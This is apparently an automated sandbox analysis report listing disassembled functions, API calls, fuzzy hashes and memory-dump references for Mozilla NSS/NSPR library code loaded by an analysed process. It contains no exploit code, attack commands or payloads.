Opcode ID: 131b024ee7b9922b0b51e8a66170bb8e5da4443fff0069b51ef49265707fa18a
Instruction ID: 5d31adc996ede7add5e63633a87e4246424decbe1f34187fa06b7b9c83ee620f
Opcode Fuzzy Hash: 131b024ee7b9922b0b51e8a66170bb8e5da4443fff0069b51ef49265707fa18a
Instruction Fuzzy Hash: D75107B1A50200DFDB019F6ADC84A6977B5FB46398F55812BDE0987721EB30EC61CB85

Function 6C5A7870 Relevance: 18.1, APIs: 12, Instructions: 138stringmemorythreadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,?,6C5A91C5), ref: 6C5A788F

Part of subcall function 6C5A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C548298,?,?,?,6C53FCE5,?), ref: 6C5A07BF
Part of subcall function 6C5A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5A07E6
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A081B
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A0825

PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A91C5), ref: 6C5A78BB
PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C5A91C5), ref: 6C5A78FA
strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A7930
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A7951
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5A7964
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5A797A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5A7988
memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C5A7998
free.MOZGLUE(00000000), ref: 6C5A79A7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A79BB
PR_GetCurrentThread.NSS3(?,?,?,?,6C5A91C5), ref: 6C5A79CA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Error$Alloc_HashLookupTablememcpy$ConstCurrentFindItem_ThreadZfreefreestrchrstrcmpstrlen
String ID:
API String ID: 1862276529-0
Opcode ID: 66eba96e30b0d1600279b01746fabaff057d3e8e0434a1ecbcac51b742c0b328
Instruction ID: 9b2982df6ccccea30a8cf7355c8e6d45c762653ae080963e2d10ed0bfce36338
Opcode Fuzzy Hash: 66eba96e30b0d1600279b01746fabaff057d3e8e0434a1ecbcac51b742c0b328
Instruction Fuzzy Hash: FC4108B1A002029FEF108BB69C45B6F77A8AF41388F240135E81997B45F734EC05C6A5

Function 6C4C4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4D97
PR_Lock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4DBA
PR_WaitCondVar.NSS3 ref: 6C4C4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4DEF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: bc5d1b8f9042d8c9e99f49d64740b8f2392217eb4de4d165376a3d1d9c45c9cc
Instruction ID: cd0cc4a55dcd39e73f9f7e09bd225da89482b784c1f98dc934e4c8036e3e426a
Opcode Fuzzy Hash: bc5d1b8f9042d8c9e99f49d64740b8f2392217eb4de4d165376a3d1d9c45c9cc
Instruction Fuzzy Hash: 474190B9A04B15CFCB00EFBAD5849697BF0BF46358F165629D848D7720E730E885CB86

Function 6C568F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C56905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5690EC

Part of subcall function 6C530F00: PR_GetPageSize.NSS3(6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F1B
Part of subcall function 6C530F00: PR_NewLogModule.NSS3(clock,6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569111

Strings

nel, xrefs: 6C5690A3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nel
API String ID: 2831689957-4255194777
Opcode ID: cffe88d2ed09f464499f1852adf1dbdadb76deece8107cd7b38e3be52308c850
Instruction ID: 327d39c5a0425d217651510fb317d72957717b60c8567ba32c4dfb4162de193d
Opcode Fuzzy Hash: cffe88d2ed09f464499f1852adf1dbdadb76deece8107cd7b38e3be52308c850
Instruction Fuzzy Hash: 68517A75A04615CFCB00EF7AC8C8259BBF4AF8A318F155569DC499BB25EB31E884CB81

Function 6C657CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C657CE0

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C657D36
PR_Realloc.NSS3(?,00000080), ref: 6C657D6D
PR_GetCurrentThread.NSS3 ref: 6C657D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C657DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C657DD8
malloc.MOZGLUE(00000080), ref: 6C657DF8
PR_GetCurrentThread.NSS3 ref: 6C657E06

Strings

:%s:%d:0x%lx, xrefs: 6C657DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C657DF0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: e02c14f48bb5249a667de96275aa067fa38c714e23134bf2cd54814db439a5d3
Instruction ID: 2a5f3eb292dd0b399e597a1a41ef5eb741495c763205c2ae53c8ca21f4079633
Opcode Fuzzy Hash: e02c14f48bb5249a667de96275aa067fa38c714e23134bf2cd54814db439a5d3
Instruction Fuzzy Hash: 4841E8B16102059FDB08CF29CD909AB37F6FF81318B75866CE8198B751D731E861CBA9

Function 6C657E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C657E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C657E46

Part of subcall function 6C531240: TlsGetValue.KERNEL32(00000040,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531267
Part of subcall function 6C531240: EnterCriticalSection.KERNEL32(?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C53127C
Part of subcall function 6C531240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531291
Part of subcall function 6C531240: PR_Unlock.NSS3(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C5312A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C657EAF
PR_ImportFile.NSS3(?), ref: 6C657ECF
PR_GetCurrentThread.NSS3 ref: 6C657ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C657F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C657F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C657F15

Strings

NSPR_INHERIT_FDS, xrefs: 6C657E41
%d:0x%lx, xrefs: 6C657EA9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: d4ee32d2ad62272957df4737ba49de87b50626b50564956104a55cefe1ba27a9
Instruction ID: 6b7bf94f2fe63ba0b122bfc6a43975be52cd49c7f7bc88ffd5620e045efdbac7
Opcode Fuzzy Hash: d4ee32d2ad62272957df4737ba49de87b50626b50564956104a55cefe1ba27a9
Instruction Fuzzy Hash: 14313770B2421A9BDB00DF69CC40AABB7B9FF46348FB08525D80593611E7319D25C79E

Function 6C564E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C564E90
EnterCriticalSection.KERNEL32 ref: 6C564EA9
TlsGetValue.KERNEL32 ref: 6C564EC6
EnterCriticalSection.KERNEL32 ref: 6C564EDF
PL_HashTableLookup.NSS3 ref: 6C564EF8
PR_Unlock.NSS3 ref: 6C564F05
PR_Now.NSS3 ref: 6C564F13
PR_Unlock.NSS3 ref: 6C564F3A

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

Strings

bUVl, xrefs: 6C564F3F
bUVl, xrefs: 6C564E5C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUVl$bUVl
API String ID: 326028414-3516259892
Opcode ID: 151ad25cbd743d4154581143692e30ad2b3dd620a57900552c6024a6a122d515
Instruction ID: f877e4590245aedb76f0b9fcab46aed770b57717aec8e0dffd58797606ee8b28
Opcode Fuzzy Hash: 151ad25cbd743d4154581143692e30ad2b3dd620a57900552c6024a6a122d515
Instruction Fuzzy Hash: 374136B4A00605DFCB00EF69C5948AABBF0FF89304B018569EC499B720EB30E895CBD5

Function 6C58ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C58DE64), ref: 6C58ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58ED22

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

PL_FreeArenaPool.NSS3(?), ref: 6C58ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C58ED6B
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C58ED38

Part of subcall function 6C4C4C70: TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
Part of subcall function 6C4C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
Part of subcall function 6C4C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C58ED52
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C58ED83
PL_FreeArenaPool.NSS3(?), ref: 6C58ED95
PL_FinishArenaPool.NSS3(?), ref: 6C58ED9D

Part of subcall function 6C5A64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C5A127C,00000000,00000000,00000000), ref: 6C5A650E

Strings

security, xrefs: 6C58ED06

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 85e234b9639194c8c4fc012b10a301cc7c8d77a37bc997ffbeb9c112a5e3a10f
Instruction ID: 212ba435aeccc1a0d7adbbc89b7c56126ffc9ab09cc80ae74706306361b589b1
Opcode Fuzzy Hash: 85e234b9639194c8c4fc012b10a301cc7c8d77a37bc997ffbeb9c112a5e3a10f
Instruction Fuzzy Hash: 11116339A02314ABD7109797AC80FBF7374AF4264CF05092DE81562E51FB60AD0D85EB

Function 6C650EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C532357), ref: 6C650EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C532357), ref: 6C650EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C650EE6

Part of subcall function 6C6509D0: PR_Now.NSS3 ref: 6C650A22
Part of subcall function 6C6509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C650A35
Part of subcall function 6C6509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C650A66
Part of subcall function 6C6509D0: PR_GetCurrentThread.NSS3 ref: 6C650A70
Part of subcall function 6C6509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C650A9D
Part of subcall function 6C6509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C650AC8
Part of subcall function 6C6509D0: PR_vsmprintf.NSS3(?,?), ref: 6C650AE8
Part of subcall function 6C6509D0: EnterCriticalSection.KERNEL32(?), ref: 6C650B19
Part of subcall function 6C6509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C650B48
Part of subcall function 6C6509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C650C76
Part of subcall function 6C6509D0: PR_LogFlush.NSS3 ref: 6C650C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C650EFA

Part of subcall function 6C53AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C53AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F2B

Strings

Aborting, xrefs: 6C650EB3
Assertion failure: %s, at %s:%d, xrefs: 6C650ED9, 6C650EE5, 6C650F06, 6C650F0B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: fa19c3809a900bd1a38af106d20a23e89a2718193a39d5e0a23340a9d896765a
Instruction ID: d85bf168bbec85f42c92fcd5c0db55c8704335e71991c1ec5c07c49a594098dd
Opcode Fuzzy Hash: fa19c3809a900bd1a38af106d20a23e89a2718193a39d5e0a23340a9d896765a
Instruction Fuzzy Hash: 02F0A4F69001157BDF003F619C89C9B3E2DDF82268F404424FD0A56612DA35EA2896BB

Function 6C5B4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C5B4DCB

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C5B4DE1

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C5B4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5B4E59

Part of subcall function 6C59FAB0: free.MOZGLUE(?,-00000001,?,?,6C53F673,00000000,00000000), ref: 6C59FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C67300C,00000000), ref: 6C5B4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C5B4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C5B4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5B521A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 40fc402624bc84641c43169acb6f1a3bb28e87125c2efa8ee7af33d1f4b6e09e
Instruction ID: bdc444a8e757cc411e9bda291616317ecef3a1b268f0dbbe7ac9e5badf390892
Opcode Fuzzy Hash: 40fc402624bc84641c43169acb6f1a3bb28e87125c2efa8ee7af33d1f4b6e09e
Instruction Fuzzy Hash: 9FF18B71E01209CBDB08CF55D8607AEBBB2FF84358F658169E915BB780E735E981CB90

Function 6C544FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C690148,?,6C556FEC), ref: 6C54502A
PR_NewLock.NSS3(00000001,00000000,6C690148,?,6C556FEC), ref: 6C545034
PL_NewHashTable.NSS3(00000000,6C59FE80,6C59FD30,6C5EC350,00000000,00000000,00000001,00000000,6C690148,?,6C556FEC), ref: 6C545055
PL_NewHashTable.NSS3(00000000,6C59FE80,6C59FD30,6C5EC350,00000000,00000000,?,00000001,00000000,6C690148,?,6C556FEC), ref: 6C54506D

Memory Dump Source

